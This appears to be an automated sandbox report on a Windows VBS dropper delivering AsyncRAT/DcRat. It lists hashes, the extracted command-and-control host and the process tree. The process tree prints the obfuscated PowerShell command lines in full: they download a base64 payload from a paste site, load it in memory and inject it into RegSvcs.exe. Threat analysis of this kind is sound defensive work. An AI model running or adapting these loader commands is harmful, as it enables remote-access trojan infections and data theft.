Analysis
-
max time kernel
132s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 13:36
Static task
static1
Behavioral task
behavioral1
Sample
23052024_1336_SISTEMA DE DENUNCIA VIRTUAL.vbs
Resource
win7-20231129-en
General
-
Target
23052024_1336_SISTEMA DE DENUNCIA VIRTUAL.vbs
-
Size
1.9MB
-
MD5
f86fb7345ac89dc3869f3537daab76bf
-
SHA1
9b20bac5d8749b33c41388b7fc463d88bfc27ccb
-
SHA256
ba58d6dc439454f2c37f8658c1d0b61446a3cf9aea0e22916e1ee5a4a396cbb9
-
SHA512
b993ef1bfef599871b1cb4ba94a556d456fe80663db32702fe3727ad6e72c2421799781a1b4afb2a1a1904e896de0e236269d8f8bd6a67bdd45c90c92d631695
-
SSDEEP
768:hRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRz/:DAc
Malware Config
Extracted
https://pasteio.com/download/xDy3ge3eELDi
Extracted
asyncrat
1.0.7
Default
febrerososte.duckdns.org:2020
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 13 1712 powershell.exe 18 1712 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1712 set thread context of 2924 1712 powershell.exe RegSvcs.exe -
Processes:
powershell.exepowershell.exepid process 3580 powershell.exe 1712 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3704 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 3580 powershell.exe 3580 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 3580 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2924 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exepowershell.exeRegSvcs.execmd.exedescription pid process target process PID 3044 wrote to memory of 3580 3044 WScript.exe powershell.exe PID 3044 wrote to memory of 3580 3044 WScript.exe powershell.exe PID 3580 wrote to memory of 1712 3580 powershell.exe powershell.exe PID 3580 wrote to memory of 1712 3580 powershell.exe powershell.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 1712 wrote to memory of 2924 1712 powershell.exe RegSvcs.exe PID 2924 wrote to memory of 216 2924 RegSvcs.exe cmd.exe PID 2924 wrote to memory of 216 2924 RegSvcs.exe cmd.exe PID 2924 wrote to memory of 216 2924 RegSvcs.exe cmd.exe PID 216 wrote to memory of 3704 216 cmd.exe timeout.exe PID 216 wrote to memory of 3704 216 cmd.exe timeout.exe PID 216 wrote to memory of 3704 216 cmd.exe timeout.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23052024_1336_SISTEMA DE DENUNCIA VIRTUAL.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒B0▒G0▒ZgBu▒Gc▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒GY▒cQB6▒Hg▒cg▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒Hk▒aQB0▒HM▒cw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBw▒GE▒cwB0▒GU▒aQBv▒C4▒YwBv▒G0▒LwBk▒G8▒dwBu▒Gw▒bwBh▒GQ▒LwB4▒EQ▒eQ▒z▒Gc▒ZQ▒z▒GU▒RQBM▒EQ▒aQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒eQBp▒HQ▒cwBz▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒R▒Bi▒FQ▒bQBr▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒GY▒cQB6▒Hg▒cg▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒d▒Bt▒GY▒bgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\23052024_1336_SISTEMA DE DENUNCIA VIRTUAL.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$tmfng = '0';$fqzxr = 'C:\Users\Admin\AppData\Local\Temp\23052024_1336_SISTEMA DE DENUNCIA VIRTUAL.vbs';[Byte[]] $yitss = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xDy3ge3eELDi'));[system.AppDomain]::CurrentDomain.Load($yitss).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('0/DbTmk/d/ee.etsap//:sptth' , $fqzxr , '_______________________-------------', $tmfng, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA469.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:3704
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4088,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:81⤵PID:4496
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD52532ed74f6b6e30770ee04ff3dfcd8d7
SHA1e5b17c4277a7515a3d85305c8b96de45e96089c9
SHA256315beefaa4a326aa978c32f4f5857dc9005ee5b24d14f1573e62f409164c0b4d
SHA5125fbdd6d84c25e7a486e4bf91f33d8a543eff799262ddbd0e79b603c3688271c1f45bd579c29c31d7cf32c534b60ad5510b855e6bc56528d093f1217c7bfccead